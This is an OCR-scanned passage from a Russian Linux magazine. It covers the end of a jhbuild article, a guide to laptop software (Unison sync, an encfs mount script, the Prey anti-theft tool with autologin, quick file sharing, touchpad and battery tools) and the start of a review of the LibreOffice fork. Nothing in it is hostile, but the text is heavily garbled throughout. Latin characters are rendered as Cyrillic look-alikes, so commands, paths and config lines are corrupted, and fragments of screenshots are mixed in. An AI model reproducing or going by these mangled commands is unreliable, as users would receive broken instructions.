дпоте.огд/ЛпЬиіІб/МобиІезеІз . Модули устанавливаются рекурсивно, 
то есть, если для работы одного из них потребуется другой, тот будет 
собран автоматически. В простейшем случае файл выглядиттак: 

$ папо~/..|ЫэшШгс 

героз[ ' §іі.§поте.ог§' ] = ' ззЬ://изе^@§і1:.§поте.о^§/§і1:/ , 
тобиіезеі: = '^поте-зиНез-соге-З.О' 
тобиіез = [ 'те-Ьа-^поте-безк-Еор' ] 

сЬескоиігооІ: = оз . раіЬ . ехрапбизег( '~/сЬескои1:/§поте ' ) 
ргеііх = ' /орі/^поте' 

# флаги СПАС5 

# оз.епѵігоп[ 1 СРІ_АС5 ' ] = ' -Іліаіі -§ -00' 

# дополнительные аргументы вроде 

' --бізаЫе-зіаІгіс --бізаЬ1е-§1:к-бос ' 

#аи1:о§епаг§5= ' ' 
такеаг§з = ' - □ 2 ' 

После настройки набираем: 

$ □ ИЬиіІб запі1:усІіеск 

Программа создаст необходимые для работы каталоги и проверит на- 
личиеутилит, используемых при сборке. Здесь есть нюанс: запускать 
]ЬЬиіІсІ от имени рута нельзя, поэтому все рабочие подкаталоги и 
прочие действия, требующие привилегий администратора, придется 
выполнять вручную, затем повторно вводить «]'ЫэиіІб запііусбеск». 

Все зависимости описаны в документе Ііѵе. д поте. огд/бЬЬиі 16 Ре- 
репбепсіез и доступны в репозитории любого дистрибутива (мини- 
мум это: пп4, Регі, РуіЬоп и ѲСС). Я бы рекомендовал использовать 
именноего, впоследствии не будет проблем с обновлениями, идругие 
программы будут«видеть»установленныетаким образом пакеты. 

Хотя предлагается альтернативный вариант — просто использовать 
параметр Ьооізігар: 

$ дбЬиіІб Ьоо1:5І:гар 

Если запііусбеск показал, что все нормально, можно переходить к 
следующему шагу: 

$ □ ИЬиіІб Ьиііб 

Теперь б НВиіІб загрузит, соберет и установит все описанные в 
-/дФіЬиіІбгс модули. Оченьудобно, что в случае ошибки на любом этапе 
сборки скрипт не заканчивает работу, а выводит меню, позволяющее 
выбрать дальнейшее действие (пропустить, повторить, сконфигури- 
ровать ит.п.). 

С помощью бНВиіІб можно собрать и отдельное приложение или 
библиотеку: 

$ □ ИЬиіІб Ьиііб §1:к+ 

Заключение 

Каквидишь, в самостоятельной сборке КйЕ4и ОІЧОМЕЗ нетничего 
сложного. Разработчики проектов позаботились о продвинутых (и не- 
терпеливых) пользователях, подготовив вспомогательные инструмен- 
ты. Конечно, некоторое время следует потратить на изучение настроек 
в конфигурационных файлах, но результат о прав дает ожидания, тг 
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■ ■ Евгений Зобнин (ехесЬіЬги) 




ПРОКАЧАЙ 
СВОИ НОУТБУК! 



«Ми$1 Иаѵе»-софт для владельцев ноутбуков 

• С технической точки зрения ноутбуки и нетбуки мало чем 
отличаются от обычных стационарных компов, однако у лаптопов 
есть своя специфика использования, которая не пересекается с 
обычными ПК и поэтому требует особых настроек и приложений. 



Коротко о проблеме 

Почему ноутбуктребует установки и настройки дополнительного ПО? 
Да просто потому, что он отличается отобычного компа: 

1. Ноутбуки и нетбуки принято использовать как замену стационарного 
компа в случае, когда последний оказывается недоступен или неудо- 
бен. Это значит, что ноутбукдолжен иметь какие-то средства синхро- 
низации файлов, чтобы ты всегда работал с актуальной информацией, 
не обременяя себя перекидыванием файлов вручную. 

2. Ноутбук — лакомый кусочек для воров, поэтому необходимо поза- 
ботиться о защите своих личных данных и установить ПО, которое 
поможет вернуть устройство на его законное место. 

3. Ноутбук — портативное устройство, с которым ты можешь придти на 
учебу, работу, кдрузьям. Поэтому он должен иметь удобные средства 
обмена информацией с любым другим устройством, будьто телефон, 
обычный комп или другой ноутбук. 

4. Ноутбук имеетограниченные средства взаимодействия с пользова- 
телем: небольшой (и часто широкоформатный) экран, тачпад вместо 



мыши, не всегда удобную клавиатуру с набором горячих клавиш, 
которые могут просто не работать. Нужны средства, позволяющие на- 
строить все эти «органы ввода-вывода» и сделать их как можно более 
удобными. 

5. Ноутбукоснащен батареей, которая иссякнет за полтора-два часа, 
если не предпринять каких-то особых мер. 

Есть еще множество различных нюансов, таких как «фирменные 
элементы управления», не работающие в Ыпих, наличие веб-камеры, 
встроенного модема и других устройств из коробки. Но они нетак важ- 
ны. Больше всего нас интересуют перечисленные выше пять пунктов, 
разбором которых мы и займемся. 

Синхронизация данных 

Если ты используешь ноутбук в качестве своего основного инструмен- 
та и единственного ПКв доме, то проблема синхронизации данных 
тебя фактически не касается. Но если это лишь «походный» вариант, то 
вопрос актуализации данных на ноутбуке встаетостро. 

Есть несколько способов держать файлы портативного устройства в 
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[]! /Ьіп/зЬ 

= /Ьоте / ѵвзу а І . сгу р Іо 
=/Г>оше / ѵгзуа / сЗе с г ур 1 а 

И [ дгер епеТв /ргос/пюип*а ! дгер Ц1НТ)' 1= ] : 

гепііу — = епс?® — диѳзі Іоп — = Отключить епс(в? 

И [ $? в ] 

Гизегігаипі $0ЕС 

8 1 38 

гепНу — епігу — Нісіе-Іехі — = епсТз — = Пароль? епс^з $ЁНС $0ЕС 

Ті 



ѴЫп/епсГепюипІ.зй С®Іі] 35 Ѳх2Э 



Простой скрипт, который позволяет не заботиться о монтировании епсЬ вручную 



актуальном состоянии. Самое простое — перекидывать 
файлы с основного компа каждый раз, когда ты отправля- 
ешься в путь. Просто, без лишнихзаморочек, но неудобно. 
Файлы можно синхронизировать удаленно, используя 
инструменты типа гзупс.зср или даже діі, нотакой подход 
опять же требует ручного вмешательства и, кроме того, 
жреттрафик(а он уж больно дорогой для беспроводного 
интернета). Гораздо проще и дешевле воспользоваться 
специальными инструментами, изначально разработанны- 
ми для синхронизации данныхмежду машинами. Наиболее 
известный инструмент на этом поприще носит имя ОгорЬох, 
за последние годы он стал настолько популярен, что я не 
верю, что ты еще не пользуешься его возможностями. Но 
даже если это не та к, установить его не со ста вит труда. 
ОгорЬохудобен и полностью автоматизирован, после 
запуска он сразу начинаетсинхронизацию, да такумело, 
что затраты на трафикоказываются минимальными (это 
происходит благодаря беНа-синхронизации, во время ко- 
торой загружаются только изменившиеся части файла). Но 
у ОгорЬох есть пара очень досадных проблем. Во-первых, 
он хранит файлы на собственных серверах, что влечет 
за собой очевидные проблемы с конфиденциальностью 
(сами создатели ОгорЬох говорят, что архитектура их 
сервиса в принципе не позволяет им подсмотреть чужие 
данные, но полагаться на ихзаверения я бы не стал), а 
во-вторых, он имеетограничение на объем загруженных 
данных (2 Гб), для снятия которого придется заплатить. 
Если тебя все это не устраивает, то предлагаю отличную 
альтернативу под названием ІІпізоп, который имеет 
почти все преимущества ОгорЬох, оснащен двумятипами 
интерфейса (6ТК и СЫ), тонко настраивается, но самое 
главное — хранит файлы не«где попало», а натвоем 
собственном домашнем компе. 

Единственные его ограничения — это необходимость 
поднятия 85Н-сервера наудаленной (домашней) машине 
и белый ІР-адрес, по которому до машины можно будет 
достучаться. Если это условие выполнено, то дело за 
малым. Надо просто установить ІІпізоп на сервер: 

$ біісіо ар1:-§е1: іп5І:а11 ііпібоп 

И с помощьютакойже команды — на клиентскую машину 
(ноутбук). Далее на клиентской машине запускаем графи- 
ческий интерфейс: 

$ ипІ50п-§1:к2 



Выбираем профиль (можно оставить сіебаиіі;), далее — 
локальный каталог. В следующем окне вводим путь до 
удаленного каталога, указываем метод подключения к 
серверу (55Н), адрес сервера и имя пользователя. 

После этого должно открыться главное окно программы, в 
котором будут показаны различия между каталогами. Для 
запуска процедуры синхронизации достаточно нажать Ѳо. 
Чтобы ІІпізоп автоматически производил синхронизацию 
каталогов, его следует добавить в сгоп: 

$ есЬо "*/1Ѳ * * * * /иБг/Ьіп/ипІБОп -аи1:о -ЬаІісЬ" 

| сгопѣаЬ - 

Защищаемся от воров 

Ноутбуки крадут, и крадут часто. Тоненький, компактный 
девайс, опрометчиво оставленный владельцем без присмо- 
тра, довольно просто утащить с собой. Найти вора обычно 
оказывается практически невозможно, ноутбук в тот же день 
будет продан по бросовой цене. И можешь даже не наде- 
яться на то, что новый владелец не просмотрит содержимое 
жесткого диска и не воспользуется паролями, сохранен- 
ными в браузере. Избежать этого можно двумя путями: 

Настраиваем прокрутку с помощью дзупаріісз 

Общи* Н.Ш47И* [прМфуткд Л(г*ІегАТЮй 

Прокрутка 

йклшчнть вертикальную прокрутку 
дерддегшн* і ■« $ы етр** 

ВяЛй-ЧИГь- [орліУмТ лЛьиуга Пропру Ік? 

МЪДЛЪННѴЪ 1 Быстръ* 

ЦНя/МЧІСіІртО ПрОКру Тр.у 

МедптнігѴ- Г і 7 Быстрее 

МгіЧиііП-иыи іфчл .і ингишичН-ВДіі прокрутки! 



Нні «раю 

пр&длпжать прокрутку 
Движений курсора 




• В АгсЫіпих есть 
более развитая 
альтернатива ѵѵеЫъ с 
возможностью загруз- 
ки файлов на сервер: 

$ уаоигі: -5 яиіскзегѵе 
$ яиіскзегѵе \ 

/путь/до/ каталога 

• Самый простой спо- 
соб выложить каталог 
в сеть: 

$ ссі /путь/до/каталога 
$ руЫіоп -т \ 

БітрІеНТТРБегѵег 

• Отключаем тачпад 
из командной строки: 
$ зупсііепі: 
ТоисІірасІО-р-р=1 
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ІШІХОЮ 




А эффективен ли Ргеу? 



У Ргеу есть одна очень серьезная проблема: он требует сетевого 
подключения к интернету, а шансы на то, что вор (или купивший 
украденный ноут человек] настроит его, когда будет лазить по твоей 
системе, минимальны. Поэтому следует позаботиться о том, чтобы 
система автоматически подключалась к любым доступным каналам 
связи во время загрузки. С обычным ЕіЬегпеІ все просто — любой 
І_іпих и так по умолчанию настраивает все проводные сетевые 
интерфейсы с помощью ОНСР (если ты отключил эту возможность, 
верни все на место]. А вот с ѴѴіРі сложнее: открытые беспроводные 
сети сегодня есть только в общественных местах, но вряд ли новый 
владелец будет «крутить» ноут там, в любом другом месте для входа 
в интернет потребуется ключ. Так что придется надеяться только на 
«плохие мозги» человека, который догадается подключиться к сети 
сам. 



ѴѴіпсІоѵѵз как приманка 



Новый владелец ноута — твой главный помощник в деле поиска 
устройства. Многие покупатели краденых ноутбуков даже не 
подозревают о прошлом портативного девайса и без зазрения 
совести начинают использовать его для своих нужд, не заботясь 
о переустановке системы (если они вообще в курсе, что такое ОС]. 

Но это справедливо только в том случае, если на но^е установлен 
ѴѴіпбоѵѵз. Странный и непонятный для рядовых пользователей 
Ыпих, скорее всего, будет быстро снесен, и все твои ухищрения 
с шифрованием и установкой Ргеу полетят в тартарары. Поэтому 
гораздо эффективнее настроить биаі-бооі:, при котором ѴѴіпсІоѵѵз 
будет загружаться автоматически, и Ргеу будет работать уже в нем (да, 
Ргеу — кроссплатформенная софтина, которая может работать еще и 
в Апбгоіб]. 



защитить паролями все, что только можно, и зашифровать жесткий 
диск, либо установить на устройство специальное ПО, которое поможет 
найти текущего пользователя ноутбука. Но еще лучше использовать 
комбинированный подход, при котором в ОС будет установлен софт, 
позволяющий отыскать вора, доступ в систему останется полностью 
открытым, а всетвои важные данные будутпомещены в специальный 
зашифрованный каталог или дисковый раздел. Такты убьешь сразу двух 
зайцев: позволишь любопытному воришке (или новому «владельцу») 
спокойно войти в систему и исследовать ее (в результате чего успеет 
сработать механизм, который доложиттебе о новом владельце ноута) и 
вто же время защитишьличные данные. Какэто сделать? Очень просто: 
тебе понадобятся: 

1) пакет епсі'з, содержащий шифрующую файловую систему (те, кто 
знаком с ТгиеСгурІ или бт-сгурЕ могут использовать их); 

2) и программа Ргеу, которая будет скидыватьтебе на мыло инфу о теку- 
щей сетевой конфигурации ноута, снимки сѵѵеЬ-камеры ит.д. Сначала 
установим и настроим епсі'з. Она есть в любом дистрибутиве, так что 
просто воспользуемся пакетным менеджером: 



$ тѵ ~/ . соп^і§/сІіпотіит ~/бесгур1:о 

$ 1п -5 ~/бесгур1:о/сбготіит ~/ . соп^§/сбготіит 

Такая схема отлично работает, но требует ввода команды, подключаю- 
щей епсі'з каждый раз, когда ты входишь в систему. Из этой ситуации 
можно выйти, настроив автоматизированное монтирование епсі'з с 
помощью рат_тоипІ или скрипта, но мы не можем полагаться на эти 
инструменты, потому какони требуют сохранения пароля отзашифро- 
ванного каталога на диске. Однако общий дискомфорт можно несколько 
снизить, если написать скрипт, который будет выводить диалоговое 
окноспросьбой ввести парольсразу послелогина пользователя. Вотон: 

$ѵі~/Ьіп/епс*5тоип1.5Іі 

#! /Ьіп/зіі 

ЕІ\ІС=/Ііоте/ѵа5уа/ . спурѣо 

0ЕС=/Ііоте/ѵа5уа/беспур1:о 

і-р [ '§гер епс-Рз /ргос/тоигтРз | §гер $NN1)' != "" ]; 

-рбеп 

іепіііу - -1:і1:1е= " епс-Рз" --диезіііоп --1:ех1:= ,, Отключить епс-Рз?" 



і* [ $? == Ѳ ] 

$ зисіо ар1:-§е1: іпзііаіі епс-Рз ІіРіеп 

-Ризептоипі: -и $йЕС & 

Далее необходимо создать каталог, который будет содержать все важ- ь 

ныеданные в зашифрованном виде. Пусть это будет -/.сгуріо: е і 5е 



$ ткбіг ~/.сгур1:о 

Также необходимо выбрать/создать точку монтирования файловой 
системы. Назовем ее -/бесгуріо: 

$ ткбіг ~/бесгур1:о 

Теперь подключаем к каталогам епсі'з: 

$ епс-Рз ~/.сгур1:о ~/бесгур1:о 

Вответна первый вопрос вводим «р». Далее указываем парольнадо- 
ступ кданным. Отныне все файлы и каталоги, помещенные в бесгуріо, 
будутзашифрованы, а результат размещен в каталоге -/сгуріо. После 
отключения файловой системы они станут недоступны для чтения. 
Можешь проверить это: 

$ -Ризегтоипі: -и ~/бесгур1:о 
$ 1з -1 ~/.сгур1:о ~/бесгур1:о 

В бесгуріо можно складывать все, что ты считаешь важным и хочешь 
защитить от рук воров. Также туда можно засунуть настройки различ- 
ных программ, например, ѵѵеЬ-браузера: 



іепііу --епігу --бібе-іехі: --Ііііе^'епс-Рз" \ 
---рех^Пароль?" | епс-Рз -5 $ЕІ\ІС $йЕС 
Рі 

Делаем файл исполняемым («сЬтоб +х -/Ьіп/епс^тоипТзЬ») и 
создаем ярлыкна рабочем столе. Ещелучше добавитьскриптв каталог 
-/.сопбд/аиіозіагі;, чтобы он запускался во время старта графической 
оболочки. Теперь мы должны установить и настроить пакет Ргеу. Он 
представляет собой набор скриптов, собирающих информацию о систе- 
ме и отправляющихеелибо на сайтпроекта, гдеты сможешь просмо- 
треть ее с помощью панели управления, либо на твой е-таіі. Отсылае- 
мые данные включают в себя такую информацию, как географическое 
положение, определяемое с помощью ближайшихточекдоступа ѴѴіРі 
или 0Р8-модуля, текущие настройки сети, активные сетевые соедине- 
ния, данные Ігасегоиіе, скриншот рабочего стола, список измененных 
файлов и запущенных программ, снимоксѵѵеЬ-камеры. Крометого, 
скрипт можетзаблокировать учетную запись пользователя, вывести 
предупреждающее сообщение типа: «Верни ноут, сволочь, я все про- 
щу», удалить все кукисы и пароли, сохраненные браузером, а также 
издать громкий сигнал, который позволит найти лаптоп, если его еще 
не успели унести далеко. Итак, идем на официальный сайтпрограммы 
( ргеѵрго]есЕсот ) и скачиваем последнюю Ыпих-версию. На момент 
написания статьи это была версия 0.5.3. Разворачиваем архив в каталог 
/изг/збаге: 
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СзІтШтуІіозі ~3$ /изг/зНаге/ргеу/ргеу .зЬ — сЬеск 



— СНЕСК МСГСЕ ОН. 



I## РВЕѴ 0.5,3 зргеасіз Из шіпдзі 

№ и лих туМозі 2.6,37-РРСН #1 5І1Р РКЕЕНРТ Ргі Маг 25 15:10:00 СЕТ 2 
011 хѲ6_Б4 ЯМО ЯіЫоп(Іт) II Оиаі-Соге М32Ѳ ЯиіЬепІісВМО 6Ни/ІЛпих 

— І_оокіпд Тог соппесііал . , . 

— Ваі пеТшагк соппесііоп! 



» ѴегіТуІлд Ргеу іпзіаііаііоп. . . 

— СРескіпд іТ сгоп сіаетоп Із гиппіпд... 

— Сгоп гіаетоп ТоипсІ, 

— СРескіпд Тог сгопТаЬ епігу,., 

— РоипсЗ! 

» ѴегіТуіпд ЯРІ апгі Оеѵісе кеуз... 

** ЯРІ кеу із ѵаіісі, Ѵоиг изег ассоипі із соггесііу зеТ ир, 
»» Оеѵісе кеу із ѵаіісі. ВоосІ. Сиггепі зіаіиз із ок, 

[^ІтѲтуИозі ~]$ | 

Ргеу правильно настроен и готов к работе 



$ ссі /изг/збаге 

$ зисіо ипгір ~/ргеу-0.5.3-1іпих.2Ір 

Теперь, если ты хочешь использовать ѵѵеЬ-панель, расположенную 
на сайте Ргеу для отслеживания ноутбука, то переходи по адресу. 
сопігоі.ргеургс^есі.сот . регистрируйся, далее нажимай кнопку «АсІсІ 
пеѵѵбеѵісе», вводи данныеустройства, в окне настроек в панели 
«Іпіюгтаііоп Іо даТЬег» включай все опции (такты получишь макси- 
мально подробную информациюобустройстве). С левой стороны экра- 
на расположена панелька «Реѵісе іпЬгтабоп», в последней строке 
которой указан ключ, его нужно прописать в конфигурационный файл 
Ргеу, чтобы связать ствоим аккаунтом в панели управления. Открой 
файл/изг/зНаге/ргеу/сопбд и добавь в него следующую строку: 

сІеѵісе_кеу= ' ключ ' 



Главное окно программы кеуІоисЬ 




I- Ц 

МІ ШШж 

М1»№и^ь«.| 

*+*і\ 

Ъшвл-І ім! 



иаѵтоисп 

у ѵ ѵ к 







Е^іійіЧЪ 

г ПрпШІМ»! 






*** щ ыіЬ Іігнп ІыіА Хіріп 












* 



Теперь нажми на ссылку «Ассоипі» в верхней части панели управле- 
ния, слева будетуказан АРІ Кеу, его также надо добавить в конфигура- 
ционный файл: 

арі_кеу=' ключ ' 

Теперьзапусти Ргеу в режиме проверки, чтобы убедиться, что все 
работает правильно: 

$ з И ргеу.зіі --сбеск 

Результат должен быть таким, какпоказано на скриншоте. Если это так, 
значит, Ргеу нормально функционирует, и теперь каждый его запуск 
будет сопровождаться отсылкой информации в панельуправления 
(если, конечно, ты пометишьего каккраденый в этойже панели). 
Далее следует поместить Ргеу в сгоп, чтобы он стартовал каждые 1 0 
минут: 

$ зисіо зи 

$ есбо "*/1Ѳ * * * * /изг/збаге/ргеу/ргеу . зб > /ѵаг/1о§/ргеу . 
1о§" | сгопѣаЬ - 

Протестировать систему можно просто зайдя в панельуправления, 
выбрав устройство и установив переключатель Міззіпд в положение 
«ѴЕ5». После этого Ргеу начнет слать отчеты. Их можно увидеть на 
главной странице панели управления, если нажать на зеленую кнопку 
«Ыеѵѵ герогі!». 

Бесплатный аккаунт Ргеу имеетограничение на три устройства и стек 
из десяти отчетов (если придет одиннадцатый отчет, первый будет 
удален), поэтому, возможно, лучшим решением будет использовать 
Ргеу без панели управления, настроив его так, чтобы все отчеты 
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ІШІХОЮ 



ІЬ^аІ «Алгміні 



-І^Чфа#Ьа ЬЬпЬіІ гіЯа 




Самый простой способ задейство- 
вать ѵѵео-камеру в Цпих 



Вывести изображение на экран: 

$ тріауег Х.ѵ:/ / 

Сделать снимок по нажатию 5: 

$ тріауег Х.ѵ\/ / -ѵі Р зсгеепзЬоІ: 

Записать видео в файл: 

$ тепсосіег Х.ѵ:/ / -оѵс Іаѵс -о меЬсат.аѵі 



Если ты используешь 5Ііт в качестве менеджера входа в систему, то 
добавь следующие строки в файл/еІс/зІіт.сопГ 



Местоположение ноутбука, указанное Ргеу, оказалось 
на 10 км дальше реального 



$ зіісіо ѵі /еіс/бііт.сопі 

сІе-Раи11;_и5ег ѵазуа 
аи1:о_1о§іп уез 



отправлялись сразу на твой е-таіі. Однако, чтобы эта функциональ- 
ность работала правильно, ты должен иметь в своем распоряжении 
ѵѵеЬ-сервер, по отсутствию/наличию определенной страницы на 
котором Ргеу будет принимать решение о необходимости слать отчеты 
(например, после кражи ноута ты создаешь страницу Іар1;ор_тІ55еб. 
Ыті на сервере с адресом зііе. сот, и Ргеу, увидев это, начинает слать 
письма науказанный е-таіі). 

Если сервер есть, просто открой конфигурационный файл и добавь в 
него следующие строки: 

$ зисіо ѵі /изг/зИаге/ргеу/соггіід 

# Страница проверки 

сбеск_иг1= ' Ыір : //зііе . сот/1ар1:ор_тІ55есІ . Ыті ' 

# Если страница доступна - лаптоп украден 
тІ55Іп§_5І:а1:и5_сосІе= ' 200 1 

# Шлем отчеты по е-таіі 
роз1:_те1:ІіосІ= ' етаіі ' 

# Ящик и адрес почтового сервера 
таі1_1:о= ' ѵазуа@§таі1 . сот ' 
зт1:р_5егѵег= ' зтіір . §таі1 . сот : 587 1 
5ш1:р_и5егпате= 1 ѵазуа@§таі1 . сот ' 
зт1:р_ра55ыопсІ= 1 пароль ' 

И последнее: ты должен настроить автологин, чтобы новый владелец 
ноута мог в него войти и пошарить в поисках чего-то интересного 
(авось он догадается воткнуть в ноутЕіЬегпеІ-кабельили подключить- 
ся кдомашнемуѴѴіЕі). 

Чтобы это сделать, следует отредактировать конфигдбт (бпоте) или 
кбт (КРЕ). В случае с дбт открываем файл /еіс/дсіт/сизіопп.сопі и 
добавляем в него следующие строки: 

$ зіісіо ѵі /еіс/дсіт/сизіот.соп* 

[сіаетоп] 

ТітесИо§іпЕпаЬ1е=1:гие 

Аи1ота1:ісІ_о§іпЕпаЫе=-РаІ5е 

ТітесИ_о§іп=ѵазуа 

Аи1:ота1:ісІ_о§іп=ѵа5уа 

ТітесИо§іп0е1ау=5 

0е-Раи11:5е5 5Іоп=§поте 

Для кбт открываем файл /изг/ІосаІ/зЬаге/сопбд/кбт/кбппгс и пишем 
в него: 



Обмен инфой 

Часто ноутбук приходится использовать какдоступный под рукой 
носитель информации, который можно быстро подключить к чужой ло- 
кальной сети и произвести обмен данными с другими хостами. Вопрос 
только в том, как проще всего и быстрее это сделать. 

Почти все дистрибутивы Ып их включают в себя 5МВ-клиенти 
сервер (ЗатЬа), который можно использовать для обмена файла- 
ми с ѴѴіпбоѵѵз-машинами. Но мнетакой подход кажется слишком 
громоздким, тем более, он скорее всего не сработает, если на 
другом компе установлена какая-нибудь ЕгееВЗР, или это вообще 
смартфон. 

В этом случае спасут старые добрые протоколы ЕТР и НТТР. Например, 
чтобы расшарить каталог по ЕТР, в большинстве систем достаточно 
установить Ир-сервер: 

$ зіісіо ар1:-§е1: Іпз1:а11 ѵзТІірсІ 

И сложить все файлы в каталог/Ьоте/Ир (внутри него можно создать 
каталог риЬ, тогда другие пользователи смогутеще и заливать файлы). 
Еще проще поднять простой ѵѵеЬ-сервер: 

$ зисіо ар1:-§е1: Іпз1:а11 меЬТз 
$ меЬТзсІ -р 8080 -г /путь/до/каталога 

В браузере вводим Ьир://ІР-адрес:8080. 

Расширение функциональности 

Клавиатура ноутбука может иметь несколько специальных кла- 
виш, используемых для управления какими-либо функциями. 
Дополнительные элементы управления могут располагаться и на 
корпусе устройства. Часто они отказываются работать прямо из 
коробки, поэтому нужна программа, которая могла бы их активи- 
ровать. 

Линуксоиды старой школы для настройки клавиш на свой вкус исполь- 
зуют инструмент хтобтар, однако это слишком хардкорный способ. 
Гораздо проще воспользоваться графической программой кеуІоисЬ 
( кеуІоисЬ.зГпе ). которая уже имеет преднастроенные карты клавиш 
для многих мультимедийных и ноутбучных клавиатур. 

Пакете программой есть в любом дистрибутиве, так что для установки 
просто выполняем привычную команду: 

$ зисіо арі-^еі: Іпз1:а11 кеуІоисЬ 



$ зисіо ѵі /изг/ІосаІ/зИаге/сопЛд/ксіт/ксІтгс 

І\ІоРаз5ІІ5ег5=ѵа5уа 

0е-Раи11:ІІ5ег=ѵа5уа 

Аи1:оІ_о§іпІІ5ег=ѵа5уа 



После запуска программа предложит выбрать производителя и модель 
клавиатуры/ноутбука. Возможно, в списке не окажется твоей модели, 
ноты можешь попробовать другие модели (обычно производители со- 
храняютсовместимость в расположении клавиш между ними). 
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В отличие от РгорЬох, ІІпізоп позволяет проводить синхронизацию индивидуально для каждого файла 



Тачпад — другой элементуправления, который может потребо- 
вать дополнительной «доводки». Но здесь все проще: почти все 
ноутбуки оснащаются сенсорными панелями фирмы зупаріісз, 
для настройки которых в Ы п их есть отличный графический 
инструмент под названием дзупаріісз (в сущности, это просто 
надстройка над консольной программой зупсІіепС, поставляемой 
вместе с Х.огд). 

$ зисіо арѣ-зе* Іпз1:а11 §зупар1:іс5 

Далее запускаем программу и видим перед собой окно настройки. Оно 
состоит из четырех вкладок с очевидными названиями. Здесь можно 
настроить все, начиная от чувствительности сенсора и заканчивая 
«круговой прокруткой». 

Батарея 

Н оутбу к ра бота ет от бата р е и , п оэто му о ч е н ь чу в ств ител е н к жа д н ы м до 
процессорных и других ресурсов программам. Чтобы выявить та кие 
программы и убить их в случае необходимости, можно использовать 
утилиту роѵѵегіор, которая покажет процессы, в ходе исполнения кото- 
рых система потребляет больше всего энергии. 

Устанавливаем программу и запускаем ее: 

$ зисіо арТ-§еТ іпзТаІІ ромегТор 
$ зисіо ромегТор 

Ждем пять секунд, получаем доступ кіор-подобному псевдографиче- 
скому интерфейсу. В верхней части окна показаны поддерживаемые 



процессором режимы энергосбережения и количество времени, 
которое он провел в каждом из режимов. Нижняя часть окна — список 
самых прожорливых процессов, отсортированный сверху вниз. Его 
нужно внимательно проанализировать и, по возможности, избавить- 
ся от не особо нужных (хотя бы на то время, пока ноутбук работает от 
батареи). 

Некоторые железные компоненты ноутбука (ѴѴіРі- адаптер, например) 
также могут быть отключены во имя энергосбережения. Отключить 
их можно с помощью программы щрііег, которая представляет собой 
интерфейс, в котором собраны все самые необходимые инструменты 
управления ноутбуком. 

Итак, устанавливаем: 

$ зисіо ар1:-§е1: іпзііаіі диріѣег 

Далее запускаем программу. В трее появляется значок, по клику 
на котором вываливается меню, через которое можно сделать 
следующее: 

• Перевести лаптоп в энергосберегающий режим. 

• Отключить тачпад (чтобы не мешал печатать) и модуль ѴѴіРі. 

• Изменить разрешение и ориентациюэкрана. 

• Включить/отключить дополнительные видеовыходы. 

Выводы 

Ноутбукдействительно мало чем отличается отобычного компа, но как 
ты смогубедиться, он требует «особого отношения». Используя опи- 
санные в статье программы, ты сможешь сделать свою работу с ноутом 
гораздо более продуктивной, т 
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■ ■ Юрий «Асіері» Видинеев (асіерідгадтаіі.сот) 




Обзор самых интересных форков последнего 
времени 



• Форк вбирает в себя самое лучшее из прототипа и является дви- 
жущей силой в мире ОрепЗоигсе. Но это один из тех механизмов, 
к которым прибегают, как правило, только в том случае, когда при- 
йти к какому-нибудь компромиссу не удается. Ведь разветвление 
может негативно сказаться на темпах развития проекта. 



Свободный офис 

ЫЬгеСЖісе — самый масштабный форк последнего времени. Во- 
обще, предпосылки кего появлению возникли еще вто время, 
когда развитием ОрепСЖісе занималась 5ип. Многие разработ- 
чики были недовольны процессом разработки: отсутствием ре- 
альных лидеров в проекте, жестким руководством, недостаточной 
прозрачностью, необходимостью подписывать с 5ип соглашение 
о передаче авторских прав на коддля включения его в ирзігеат. 
Все эти проблемы привели ктому, что количество активных раз- 
работчиков со временем только уменьшалось. Некоторые из них 
(при поддержке, в основном, ІМоѵеІІ) поддерживали набор патчей 
для актуальной версии ООо, существенно расширяющих функ- 
циональность. Эта сборка даже носила отдельно имя — Ѳо-00 
и могла похвастаться поддержкой ѴВА-макросов, улучшенной 
поддержкой бинарных форматов МісгозоД и ООХМЦ оптимизаци- 
ей производительности и многим другим. До недавнего времени 
большинство дистрибутивов (511 5 Е, ОеЬіап, ІІЬипІи и другие) 



включали в свой состав именно сборку Ѳо-ОО. Надо отметить, 
что 6о-00 — это не полноценный форк, а просто набор патчей 
— то есть, его релизы жестко завязаны на релизы ванильного 
ОрепСЖісе. 

Время шло, а подход к разработке ОрепОЖсе в 5ип не менялся. 

Но вот стало известно, что О га сіе покупает Зип.Всвязис этим 
некоторые надежды возлагались на то, что после сделки раз- 
работка станет более открытой. Но Огасіе не оправдал надежд 
сообщества, поэтому группа ведущих разработчиков решилась 
сделать форк, создав для этого некоммерческую организацию 
Ооситепі Роипбаііоп. Ключевыми особенностями нового процес- 
са разработки стали полная независимость от какой-либо одной 
организации и открытость для всех желающих (больше не нужно 
передавать авторские права на код). КОоситепіРоипсІаІіоп 
быстро присоединились такие компании и организации, как Р5Р, 
0А5І5, 6ІМ0МЕ Роипбаііоп, Ѳоодіе, ІМоѵеІІ, Реб Наі, Сапопісаі 
(полныйсписокна май 201 1 года включает 39 членов — доо.ді/ 
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Экспериментальные возможности в 
иЪгеО№се 

ІІд6НЫ).0гасІе тоже было отправлено предложение 
о вступлении, а заодно — просьба передать новой 
организации права на торговую марку ОрепОІІісе.огд. 
О га сіе отказалась, более того — попросила участников 
Ооситепі Роипбаііоп покинуть совет 0 реп ОШ се. о гд . 
Четыре человека покинули совет, а для нового офис- 
ного пакета была выбрана торговая марка ЫЬгеОІІісе. 
Дальше события развивались стремительно. Сразу 
после объявления о создании Ооситепі Роипбаііоп 
(28 сентября 2010 года) вышла первая бета-версия 
ЫЬгеОІІісе 3.3.0 (нумерация версий была позаим- 
ствована у ООо), которая, по сути, представляла собой 
Со- 00. Участники приступили к созданию инфра- 
структуры: ѵѵікі, ІРС, списков рассылок (на 1 3 языках 
мира, в то мчи сл ей русском). В течение первой не- 
дели бета-версию скачали более 80000 раз. Количе- 
ство зеркал проекта выросло до 45 (в 25 странах). В 
среднем, на ІРС-канале разработчиков постоянно на- 
ходилось около 1 00 человек, а количество сообщений 
составило 1 4000. Две тысячи человек подписались на 
почтовую рассылку с анонсами, триста человек — на 
рассылку с дискуссией. В Тѵѵіиег количество фолло- 
веров выросло до шестисот. Примерно через месяц с 
момента основания проекта количество коммиттеров 
перевалило за сотню, 20 из них Іи Ші те (Веб Наі, 

N оѵе II, Сапопісаі). 

Первый стабильный релиз вышел 5 января 201 1 года 
и был скачан больше 1 ,3 миллиона раз. После выхода 
р ел изаЗ.З Ооситепі Роипбаііоп организовала сбор 
средств, необходимых для официальной регистрации 
организации в Германии. Нужную сумму (50000 евро) 
набрали за 8 дней! 

ЫЬгеОІІісе 3.3 перенял всеулучшения ОрепСЖісе.огд 
